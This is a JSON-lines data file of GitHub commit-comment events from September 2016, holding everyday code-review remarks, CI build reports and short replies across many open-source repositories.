{"id":"4549972882","type":"CommitCommentEvent","actor":{"login":"peterhoeg"},"repo":{"name":"peterhoeg/nixpkgs"},"payload":{"comment":{"id":18986486,"position":14,"line":22,"path":"pkgs/applications/virtualization/virtualbox/default.nix","commit_id":"f51c1b26808b3497f09e6279ec45c5955c6b1dbd","created_at":"2016-09-12T15:22:01Z","updated_at":"2016-09-12T15:22:01Z","body":"@DamienCassou it's getting a little late here and I will realistically not have time to work on this until Wednesday."}},"created_at":"2016-09-12T15:22:01Z"}
{"id":"4549974634","type":"CommitCommentEvent","actor":{"login":"sglanzer"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18986496,"position":64,"line":64,"path":"object-browser-config-example.js","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-12T15:22:19Z","updated_at":"2016-09-12T15:22:19Z","body":"Is this implicit if we drop it?"}},"created_at":"2016-09-12T15:22:19Z"}
{"id":"4549978405","type":"CommitCommentEvent","actor":{"login":"sglanzer"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18986502,"position":76,"line":76,"path":"object-browser-config-example.js","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-12T15:22:53Z","updated_at":"2016-09-12T15:22:53Z","body":"Can you add an example of subTitle?"}},"created_at":"2016-09-12T15:22:53Z"}
{"id":"4549979506","type":"CommitCommentEvent","actor":{"login":"michu"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18986507,"position":14,"line":18,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DatePicker/ViewModels/DatePickerViewModel.cs","commit_id":"c01ff51d87fd0894dda17d35707cb60948dc6cd8","created_at":"2016-09-12T15:23:03Z","updated_at":"2016-09-12T15:23:03Z","body":"Renamed to _todayValue everywhere."}},"created_at":"2016-09-12T15:23:03Z"}
{"id":"4549984237","type":"CommitCommentEvent","actor":{"login":"SilverFire"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":18986519,"position":43,"line":487,"path":"framework/web/View.php","commit_id":"c3622bb1ad5ebf395853fab4f3ad5ddcda0242b4","created_at":"2016-09-12T15:23:45Z","updated_at":"2016-09-12T15:23:45Z","body":"Fixed: 399696c\r\nThank you"}},"created_at":"2016-09-12T15:23:45Z"}
{"id":"4549984535","type":"CommitCommentEvent","actor":{"login":"SilverFire"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":18986520,"position":44,"line":488,"path":"framework/web/View.php","commit_id":"c3622bb1ad5ebf395853fab4f3ad5ddcda0242b4","created_at":"2016-09-12T15:23:48Z","updated_at":"2016-09-12T15:23:48Z","body":"Fixed: 399696c\r\nThank you"}},"created_at":"2016-09-12T15:23:48Z"}
{"id":"4549984952","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":18986521,"position":215,"line":314,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-12T15:23:53Z","updated_at":"2016-09-12T15:23:53Z","body":"Agreed. @johnslay You should check out the new Swift API design guidelines: https://swift.org/documentation/api-design-guidelines/\r\n\r\nThere's also a WWDC session video on the subject as well."}},"created_at":"2016-09-12T15:23:53Z"}
{"id":"4549986505","type":"CommitCommentEvent","actor":{"login":"sglanzer"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18986527,"position":77,"line":77,"path":"object-browser-config-example.js","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-12T15:24:09Z","updated_at":"2016-09-12T15:24:09Z","body":"I think we should be consistent between `Items` (info bar) and `Buttons` (selection bar)"}},"created_at":"2016-09-12T15:24:09Z"}
{"id":"4549987841","type":"CommitCommentEvent","actor":{"login":"IluhaFR"},"repo":{"name":"luksoral/gemobin"},"payload":{"comment":{"id":18986532,"position":2,"line":1600,"path":"css/bootstrap.css","commit_id":"5955b105e91edceac8f3e16ff1761a9cf239a2af","created_at":"2016-09-12T15:24:21Z","updated_at":"2016-09-12T15:24:21Z","body":"Минимальную ширину экрана надо тоже поменять"}},"created_at":"2016-09-12T15:24:21Z"}
{"id":"4549990044","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18986540,"position":null,"line":null,"path":null,"commit_id":"de2292f07143505f75b01c7762f495ce4aa97694","created_at":"2016-09-12T15:24:41Z","updated_at":"2016-09-12T15:24:41Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35202/testReport/) for this commit**"}},"created_at":"2016-09-12T15:24:41Z"}
{"id":"4549990174","type":"CommitCommentEvent","actor":{"login":"michu"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18986541,"position":125,"line":246,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DatePicker/Views/DatePickerControl.xaml.cs","commit_id":"c01ff51d87fd0894dda17d35707cb60948dc6cd8","created_at":"2016-09-12T15:24:42Z","updated_at":"2016-09-12T15:24:42Z","body":"Renamed"}},"created_at":"2016-09-12T15:24:42Z"}
{"id":"4549992071","type":"CommitCommentEvent","actor":{"login":"sglanzer"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18986547,"position":83,"line":83,"path":"object-browser-config-example.js","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-12T15:25:00Z","updated_at":"2016-09-12T15:25:00Z","body":"Necessary?  Also, I would assume this would be `disabled` for consistency (and negate the value)"}},"created_at":"2016-09-12T15:25:00Z"}
{"id":"4549994415","type":"CommitCommentEvent","actor":{"login":"nlyan"},"repo":{"name":"symless/synergy"},"payload":{"comment":{"id":18986549,"position":36,"line":164,"path":"src/lib/server/ClientListener.cpp","commit_id":"f285c8679511d0bf055548cbb71b99681fdf439e","created_at":"2016-09-12T15:25:24Z","updated_at":"2016-09-12T15:25:24Z","body":"@XinyuHou can you explain this change?"}},"created_at":"2016-09-12T15:25:24Z"}
{"id":"4549997022","type":"CommitCommentEvent","actor":{"login":"sidey79"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18986555,"position":5,"line":22,"path":"FHEM/14_SD_WS.pm","commit_id":"7c15b54258fef1bb0139322c5804e9fccd873c77","created_at":"2016-09-12T15:25:48Z","updated_at":"2016-09-12T15:25:48Z","body":"Sollte hoffentlich mit meinem letzten commit behoben sein. Kannst Du das verifizieren?"}},"created_at":"2016-09-12T15:25:48Z"}
{"id":"4550007406","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":18986566,"position":35,"line":29,"path":"ui/app.jsx","commit_id":"ddd7a58b6ca7ef6da524ce1628d7033fe7bdfce7","created_at":"2016-09-12T15:27:26Z","updated_at":"2016-09-12T15:27:26Z","body":"Just wanted to leave you some quick feedback on your `showResults` variable. I left Jason [a similar comment ](https://github.com/zhewenw/react-starter/commit/c9be8d8481a246f5d18c281876413d3419eb1983#commitcomment-18975196) because he had the same variable (only his was called `displayResults` and he was writing to a state variable called `query` instead of `movies`): \r\n\r\n> I'm not sure you need the state variable `displayResults`. In my eyes, you leverage the different values in the variable `state.query` like so:\r\n> \r\n>     null // Don't display because the data is loading or you're waiting on user input\r\n>     [] // No results\r\n>     [{...}, ...] // Results\r\n> \r\n> Then your render function might look like this (not sure why we're calling the state variable `query` but I'll go along with it):\r\n> \r\n>     render() {\r\n>       if (!this.state.query) return null;\r\n>       if (!this.state.query.length) return <div>No results</div>;\r\n>       return this.state.query.map(this.renderItem);\r\n>     }\r\n\r\nAlso, you can write this function more concisely using the `async/await` syntax:\r\n\r\n    async handleClick() {\r\n      const response = await searchAllMovies(this.state.searchWord);\r\n      const json = await response.json();\r\n      this.setState({ movies: json.Search });\r\n    }"}},"created_at":"2016-09-12T15:27:26Z"}
{"id":"4550015771","type":"CommitCommentEvent","actor":{"login":"paddybyers"},"repo":{"name":"ably/ably-java"},"payload":{"comment":{"id":18986577,"position":16,"line":344,"path":"README.md","commit_id":"1ab4f3a445ba6c7ee24b4b7ca41d44755fa56925","created_at":"2016-09-12T15:28:45Z","updated_at":"2016-09-12T15:28:45Z","body":"s/0.8.3/0.8.4/ ?"}},"created_at":"2016-09-12T15:28:45Z"}
{"id":"4550016418","type":"CommitCommentEvent","actor":{"login":"pcworld"},"repo":{"name":"redkeep/redkeep.github.io"},"payload":{"comment":{"id":18986579,"position":28,"line":26,"path":"t.js","commit_id":"a167e6c415c3ba65486818a467856245c54df94c","created_at":"2016-09-12T15:28:51Z","updated_at":"2016-09-12T15:28:51Z","body":"Some really stupid obfuscating there. How much did you make?"}},"created_at":"2016-09-12T15:28:51Z"}
{"id":"4550022491","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":18986598,"position":35,"line":29,"path":"ui/app.jsx","commit_id":"ddd7a58b6ca7ef6da524ce1628d7033fe7bdfce7","created_at":"2016-09-12T15:29:53Z","updated_at":"2016-09-12T15:29:53Z","body":"I'm also assuming this is just a proof of concept. What you'll actually want is to have something like this:\r\n\r\n    handleClick = () => {\r\n      this.props.dispatch(search(this.state.searchWord));\r\n    }"}},"created_at":"2016-09-12T15:29:53Z"}
{"id":"4550024670","type":"CommitCommentEvent","actor":{"login":"michu"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18986607,"position":162,"line":317,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DatePicker/Views/DatePickerControl.xaml.cs","commit_id":"c01ff51d87fd0894dda17d35707cb60948dc6cd8","created_at":"2016-09-12T15:30:17Z","updated_at":"2016-09-12T15:30:17Z","body":"Because we are restoring NON-NULL date only when new value of property is NULL. Otherwise we ignore."}},"created_at":"2016-09-12T15:30:17Z"}
{"id":"4550026723","type":"CommitCommentEvent","actor":{"login":"theRemix"},"repo":{"name":"tramngo/Context-Exercise"},"payload":{"comment":{"id":18986614,"position":13,"line":26,"path":"context.js","commit_id":"c2c36747ef997a20709c1bb2b2464570de0cf240","created_at":"2016-09-12T15:30:38Z","updated_at":"2016-09-12T15:30:38Z","body":"double check the arguments required for apply\r\n\r\nhttp://mdn.io/apply\r\n"}},"created_at":"2016-09-12T15:30:38Z"}
{"id":"4550027008","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18986616,"position":5,"line":0,"path":"js/js.translator/testData/inline/cases/arrayLiteralAliasing.kt","commit_id":"4bd433bbacf3f9f7e947777d557d7ab0c54c268b","created_at":"2016-09-12T15:30:40Z","updated_at":"2016-09-12T15:30:40Z","body":"I understand the changes, but I'm not sure what is being tested here? \nMaybe @{5b0e5172-0281-4f3d-a72e-54f9658a45d0,Alexey Tsvetkov} could explain it?"}},"created_at":"2016-09-12T15:30:40Z"}
{"id":"4550028600","type":"CommitCommentEvent","actor":{"login":"bio-scholar"},"repo":{"name":"RPI-3DAnimation/bouncing-ball-bio-scholar"},"payload":{"comment":{"id":18986623,"position":null,"line":null,"path":null,"commit_id":"b2c35bea246ae6fd3d679522e235b2bbca548c16","created_at":"2016-09-12T15:30:55Z","updated_at":"2016-09-12T15:30:55Z","body":"I noticed that and decided to redo the animation to show a soccer and\ntennis ball (removed the basketball). I uploaded a new file.\n\nOn Mon, Sep 12, 2016 at 11:13 AM, vitagrrl <notifications@github.com> wrote:\n\n> Both reference videos are good, just note that both balls are pretty\n> similar in weight and bounciness - so to differentiate them in the\n> animation you will probably want to exaggerate them.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/RPI-3DAnimation/bouncing-ball-bio-scholar/commit/b2c35bea246ae6fd3d679522e235b2bbca548c16#commitcomment-18986348>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AUU99DIN26gKKij-oq85VlEydcEZ8gVqks5qpWwpgaJpZM4Jv4wc>\n> .\n>\n"}},"created_at":"2016-09-12T15:30:55Z"}
{"id":"4550028739","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":18986626,"position":34,"line":76,"path":"Sources/DataManager.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-12T15:30:57Z","updated_at":"2016-09-12T15:30:57Z","body":"Yea, I think this would be the preferred signature according to the API design guidelines."}},"created_at":"2016-09-12T15:30:57Z"}
{"id":"4550030561","type":"CommitCommentEvent","actor":{"login":"luveti"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18986636,"position":null,"line":null,"path":null,"commit_id":"0bef3e4433f697d0468a378e716e9c4c0bd286af","created_at":"2016-09-12T15:31:16Z","updated_at":"2016-09-12T15:31:16Z","body":"I agree, it should be renamed to .musare-header or something. But it shouldn't be an id xD"}},"created_at":"2016-09-12T15:31:16Z"}
{"id":"4550030818","type":"CommitCommentEvent","actor":{"login":"sevar83"},"repo":{"name":"spacecowboy/NoNonsense-FilePicker"},"payload":{"comment":{"id":18986639,"position":87,"line":106,"path":"sample/src/main/res/layout/fragment_loading_filepicker.xml","commit_id":"9918ed541d7101895cb0b55679349721e34833ee","created_at":"2016-09-12T15:31:18Z","updated_at":"2016-09-12T15:31:18Z","body":"Crashes here. Must be `srcCompat` cause it's vector drawable."}},"created_at":"2016-09-12T15:31:18Z"}
{"id":"4550035572","type":"CommitCommentEvent","actor":{"login":"mohammadparsafl"},"repo":{"name":"mohammadparsafl/Sintra"},"payload":{"comment":{"id":18986649,"position":5,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-12T15:32:02Z","updated_at":"2016-09-12T15:32:02Z","body":"196162155"}},"created_at":"2016-09-12T15:32:02Z"}
{"id":"4550035800","type":"CommitCommentEvent","actor":{"login":"eduardolundgren"},"repo":{"name":"metal/metal.js"},"payload":{"comment":{"id":18986652,"position":null,"line":null,"path":null,"commit_id":"dad80412eeba242b70380fdc726708b45b8e1748","created_at":"2016-09-12T15:32:05Z","updated_at":"2016-09-12T15:32:05Z","body":"Should we celebrate? "}},"created_at":"2016-09-12T15:32:05Z"}
{"id":"4550035880","type":"CommitCommentEvent","actor":{"login":"NRC78"},"repo":{"name":"NRC78/nathan-charles"},"payload":{"comment":{"id":18986653,"position":1,"line":1,"path":"README.md","commit_id":"c337e3a9fa1f62915d99cc0ad91b25673b5b6fd3","created_at":"2016-09-12T15:32:06Z","updated_at":"2016-09-12T15:32:06Z","body":"[NRCxJimmyZ.pdf](https://github.com/NRC78/nathan-charles/files/467689/NRCxJimmyZ.pdf)\r\n"}},"created_at":"2016-09-12T15:32:06Z"}
{"id":"4550036989","type":"CommitCommentEvent","actor":{"login":"michu"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18986655,"position":250,"line":272,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/DateTimePicker/ViewModels/DateTimePickerViewModel.cs","commit_id":"c01ff51d87fd0894dda17d35707cb60948dc6cd8","created_at":"2016-09-12T15:32:18Z","updated_at":"2016-09-12T15:32:18Z","body":"Because not every culture has AM/PM indicator."}},"created_at":"2016-09-12T15:32:18Z"}
{"id":"4550037479","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18986658,"position":null,"line":null,"path":null,"commit_id":"25e5f2146a7a14e9c91b76df2ea8c8627d75d301","created_at":"2016-09-12T15:32:24Z","updated_at":"2016-09-12T15:32:24Z","body":"Automatic build report for commit 25e5f2146a7a14e9c91b76df2ea8c8627d75d301:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%280/0%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-0.00%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-0%20/%200%20%280.00%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-0.00%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-12T15:32:24Z"}
{"id":"4550037950","type":"CommitCommentEvent","actor":{"login":"NRC78"},"repo":{"name":"NRC78/nathan-charles"},"payload":{"comment":{"id":18986660,"position":1,"line":1,"path":"README.md","commit_id":"c337e3a9fa1f62915d99cc0ad91b25673b5b6fd3","created_at":"2016-09-12T15:32:28Z","updated_at":"2016-09-12T15:32:28Z","body":"love"}},"created_at":"2016-09-12T15:32:28Z"}
{"id":"4550037993","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18986661,"position":null,"line":null,"path":null,"commit_id":"25e5f2146a7a14e9c91b76df2ea8c8627d75d301","created_at":"2016-09-12T15:32:29Z","updated_at":"2016-09-12T15:32:29Z","body":"Automatic build report for commit 25e5f2146a7a14e9c91b76df2ea8c8627d75d301:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%280/0%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-0.00%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-0%20/%200%20%280.00%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-0.00%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-12T15:32:29Z"}
{"id":"4550040020","type":"CommitCommentEvent","actor":{"login":"vhexs"},"repo":{"name":"vhexs/UselessJournal"},"payload":{"comment":{"id":18986666,"position":34,"line":17,"path":"UselessJournal/src/main.cpp","commit_id":"f9bc6eb579666b6842d3a632cb26f55cee8facad","created_at":"2016-09-12T15:32:49Z","updated_at":"2016-09-12T15:32:49Z","body":"Need to change this so it works well, this is a very hacky solution at the moment."}},"created_at":"2016-09-12T15:32:49Z"}
{"id":"4550044099","type":"CommitCommentEvent","actor":{"login":"yuchi"},"repo":{"name":"metal/metal.js"},"payload":{"comment":{"id":18986679,"position":null,"line":null,"path":null,"commit_id":"dad80412eeba242b70380fdc726708b45b8e1748","created_at":"2016-09-12T15:33:26Z","updated_at":"2016-09-12T15:33:26Z","body":"Yeah!!"}},"created_at":"2016-09-12T15:33:26Z"}
{"id":"4550049097","type":"CommitCommentEvent","actor":{"login":"lostpg"},"repo":{"name":"lostpg/computationalphysics_N2014301020009"},"payload":{"comment":{"id":18986690,"position":null,"line":null,"path":null,"commit_id":"af300a6b77d2a0b0a7de0810833dfc8469f42f89","created_at":"2016-09-12T15:34:14Z","updated_at":"2016-09-12T15:34:14Z","body":"刚发现 Github 不资磁 `TOC` 。"}},"created_at":"2016-09-12T15:34:14Z"}
{"id":"4550051233","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":18986698,"position":51,"line":45,"path":"ui/app.jsx","commit_id":"ddd7a58b6ca7ef6da524ce1628d7033fe7bdfce7","created_at":"2016-09-12T15:34:34Z","updated_at":"2016-09-12T15:34:34Z","body":"Rather than wrap your entire function in a conditional statement, you could exit early by returning null if the condition fails. Also, in an earlier comment, I mentioned that the `showResults` varaible isn't necessary as long as you're smart with how you use your `movies` variable:\r\n\r\n    renderResults() {\r\n      if (!this.state.movies) return null;\r\n    }\r\n\r\nGenerally it's considered bad practice to use anonymous functions in a map like this because it unnecessarily creates a closure. You could instead define it as a separate function:\r\n\r\n    renderButton = (entry, i) => (\r\n      <button key={i}>{entry.Title} {entry.Year}</button>\r\n    )\r\n\r\n    renderResults() {\r\n      if (!this.state.movies) return null;\r\n      return this.state.movies.map(this.renderButton);\r\n    }"}},"created_at":"2016-09-12T15:34:34Z"}
{"id":"4550051824","type":"CommitCommentEvent","actor":{"login":"michu"},"repo":{"name":"WildGums/Orc.Controls"},"payload":{"comment":{"id":18986700,"position":20,"line":37,"path":"src/Orc.Controls/Orc.Controls.Shared/Controls/TimeSpan/ViewModels/TimeSpanViewModel.cs","commit_id":"c01ff51d87fd0894dda17d35707cb60948dc6cd8","created_at":"2016-09-12T15:34:40Z","updated_at":"2016-09-12T15:34:40Z","body":"Good idea."}},"created_at":"2016-09-12T15:34:40Z"}
{"id":"4550054338","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"sumoist/basic_course"},"payload":{"comment":{"id":18986705,"position":4,"line":6,"path":"Lesson_5/cargo_train.rb","commit_id":"923a1491f0a1721fd40ad5f061d89c7bae4a8d71","created_at":"2016-09-12T15:35:05Z","updated_at":"2016-09-12T15:35:05Z","body":"Если вызывать `super` после `@type = :cargo` то в родительском классе в конструкторе переменная `@type` уже будет доступна и можно этот код снова вынести в родительский класс тем самым избежав дублирования."}},"created_at":"2016-09-12T15:35:05Z"}
{"id":"4550055558","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18986709,"position":null,"line":null,"path":null,"commit_id":"ba212460e990393b1f0d8f03efd96f71db8ca064","created_at":"2016-09-12T15:35:18Z","updated_at":"2016-09-12T15:35:18Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#DPq5S6tKRC-FwAuejQH16w"}},"created_at":"2016-09-12T15:35:18Z"}
{"id":"4550056742","type":"CommitCommentEvent","actor":{"login":"BobHarper1"},"repo":{"name":"BobHarper1/uk-government-cats"},"payload":{"comment":{"id":18986711,"position":null,"line":null,"path":null,"commit_id":"978cf631aba9941b8d437a7ae81cd68a7b318142","created_at":"2016-09-12T15:35:30Z","updated_at":"2016-09-12T15:35:30Z","body":"This is for example purposes only. I'm using it in a training course - I really don't know how many confirmed kills each cat has!"}},"created_at":"2016-09-12T15:35:30Z"}
{"id":"4550063222","type":"CommitCommentEvent","actor":{"login":"cldougl"},"repo":{"name":"plotly/plotly.github.io"},"payload":{"comment":{"id":18986728,"position":13,"line":13,"path":"_posts/plotly2/2016-09-12-date-time-series-update.md","commit_id":"7db0009934a882243ae1d24e103bd82d4e3f31be","created_at":"2016-09-12T15:36:33Z","updated_at":"2016-09-12T15:36:33Z","body":"wrong `actioncall`"}},"created_at":"2016-09-12T15:36:33Z"}
{"id":"4550066854","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18986742,"position":null,"line":null,"path":null,"commit_id":"dcc4a8f1aa70c33313101b36b81db50cccaecf25","created_at":"2016-09-12T15:37:11Z","updated_at":"2016-09-12T15:37:11Z","body":"++ lgtm"}},"created_at":"2016-09-12T15:37:11Z"}
{"id":"4550071723","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":18986758,"position":58,"line":52,"path":"ui/app.jsx","commit_id":"ddd7a58b6ca7ef6da524ce1628d7033fe7bdfce7","created_at":"2016-09-12T15:37:55Z","updated_at":"2016-09-12T15:37:55Z","body":"The name of this function is a bit confusing, you may want to call it `getSingleMovie` or `showSingleMovie`. Render generally implies that you're returning an element or a component."}},"created_at":"2016-09-12T15:37:55Z"}
{"id":"4550073472","type":"CommitCommentEvent","actor":{"login":"PranavBahuguna"},"repo":{"name":"mantidproject/mantid"},"payload":{"comment":{"id":18986765,"position":49,"line":65,"path":"Framework/Algorithms/test/CreateTransmissionWorkspaceTest.h","commit_id":"98e7fcfdd855b235f9c68c4faef9ee2929dacbf1","created_at":"2016-09-12T15:38:13Z","updated_at":"2016-09-12T15:38:13Z","body":"@raquelalvarezbanos When I attempt to run the tests, it fails here as \"1/q\" is not a registered name. Did you not come across the same issue when running these tests?"}},"created_at":"2016-09-12T15:38:13Z"}
{"id":"4550076296","type":"CommitCommentEvent","actor":{"login":"mattheworiordan"},"repo":{"name":"ably/ably-java"},"payload":{"comment":{"id":18986775,"position":16,"line":344,"path":"README.md","commit_id":"1ab4f3a445ba6c7ee24b4b7ca41d44755fa56925","created_at":"2016-09-12T15:38:37Z","updated_at":"2016-09-12T15:38:37Z","body":"Bugger, fixed that didn't commit, will just `git push --force` to correct"}},"created_at":"2016-09-12T15:38:37Z"}
{"id":"4550081669","type":"CommitCommentEvent","actor":{"login":"czlee"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18986795,"position":null,"line":null,"path":null,"commit_id":"8b6874f37749fa746b1ae46c63dba8aaaf31bf42","created_at":"2016-09-12T15:39:30Z","updated_at":"2016-09-12T15:39:30Z","body":"Hmm, I thought about this, but do we want to hide it on all public pages? If there is a bug affecting (only) a public page, we probably still want the tab director to contact us about it?"}},"created_at":"2016-09-12T15:39:30Z"}
{"id":"4550082485","type":"CommitCommentEvent","actor":{"login":"TheMatthew"},"repo":{"name":"TheMatthew/fs2open.github.com"},"payload":{"comment":{"id":18986798,"position":435,"line":435,"path":"code/globalincs/tracepoints.h","commit_id":"9803bac294cf0b08e62d1d3ece46e646bc8fe5ef","created_at":"2016-09-12T15:39:38Z","updated_at":"2016-09-12T15:39:38Z","body":"define tracepoint(...)"}},"created_at":"2016-09-12T15:39:38Z"}
{"id":"4550084710","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"KnowSheet/CTFO_BE"},"payload":{"comment":{"id":18986803,"position":8,"line":261,"path":"crunchers/test.cc","commit_id":"b6c3f8eaaf855b72730745947cb1710ca48e1fe9","created_at":"2016-09-12T15:40:00Z","updated_at":"2016-09-12T15:40:00Z","body":"Now I wonder why is `seen` valued so much higher than `ctfo` or `tfu`? :-)\r\n\r\nHave you tried some `10*(ctfo+tfu) + 5*fav + seen - unfav`?"}},"created_at":"2016-09-12T15:40:00Z"}
{"id":"4550085386","type":"CommitCommentEvent","actor":{"login":"NetDEF-CI"},"repo":{"name":"opensourcerouting/quagga"},"payload":{"comment":{"id":18986805,"position":null,"line":null,"path":null,"commit_id":"0cd146a4f239c1d3ace08d890224b902c5a49fc5","created_at":"2016-09-12T15:40:10Z","updated_at":"2016-09-12T15:40:10Z","body":"# Continous Integration Result: SUCCESSFUL\n\nCongratulations, this patch passed basic tests\n\nTested-by: NetDEF / OpenSourceRouting.org CI System\n\n__CI System Testrun URL: https://ci1.netdef.org/browse/QUAGGA-GITHUBOSRQUAGGA-135/__\n\nThis is a comment from an EXPERIMENTAL automated CI system.\nFor questions and feedback in regards to this CI system, please feel free to email\nMartin Winter - mwinter (at) opensourcerouting.org.\n\n"}},"created_at":"2016-09-12T15:40:10Z"}
{"id":"4550085431","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":18986806,"position":null,"line":null,"path":null,"commit_id":"1745999d074af0877903ddabbc8605d789547545","created_at":"2016-09-12T15:40:10Z","updated_at":"2016-09-12T15:40:10Z","body":"Automatic build report for commit 1745999d074af0877903ddabbc8605d789547545:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%282/2%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-7.16%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-2%20error%28s%29-yellow.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-1785%20/%208398%20%2821.26%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-13.96%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-12T15:40:10Z"}
{"id":"4550085698","type":"CommitCommentEvent","actor":{"login":"Athas"},"repo":{"name":"Athas/EggsML"},"payload":{"comment":{"id":18986807,"position":null,"line":null,"path":null,"commit_id":"cd891543361f6c9823d593c1bdd2d3d7b85ab7ed","created_at":"2016-09-12T15:40:13Z","updated_at":"2016-09-12T15:40:13Z","body":"Det her er et ret fint eksempel på en opgave hvor shell script er rimeligt uegnet.  Godt klaret!"}},"created_at":"2016-09-12T15:40:13Z"}
{"id":"4550087474","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"KnowSheet/CTFO_BE"},"payload":{"comment":{"id":18986811,"position":22,"line":352,"path":"crunchers/test.cc","commit_id":"b6c3f8eaaf855b72730745947cb1710ca48e1fe9","created_at":"2016-09-12T15:40:30Z","updated_at":"2016-09-12T15:40:30Z","body":"Here too."}},"created_at":"2016-09-12T15:40:30Z"}
{"id":"4550088653","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"bkwsuper24/react-starter"},"payload":{"comment":{"id":18986813,"position":30,"line":30,"path":"ui/movie_display.jsx","commit_id":"ddd7a58b6ca7ef6da524ce1628d7033fe7bdfce7","created_at":"2016-09-12T15:40:40Z","updated_at":"2016-09-12T15:40:40Z","body":"This function assumes that `this.props.movie` will always be defined which is not the case. The inital state of the `App` component has `this.state.singleMovie = null`, so we just need to make sure the `MovieDisplay` render function handles this case:\r\n\r\n    render() {\r\n      if (!this.props.movie) return null;\r\n      // Now you can assume that this.props.movie is defined\r\n    }"}},"created_at":"2016-09-12T15:40:40Z"}
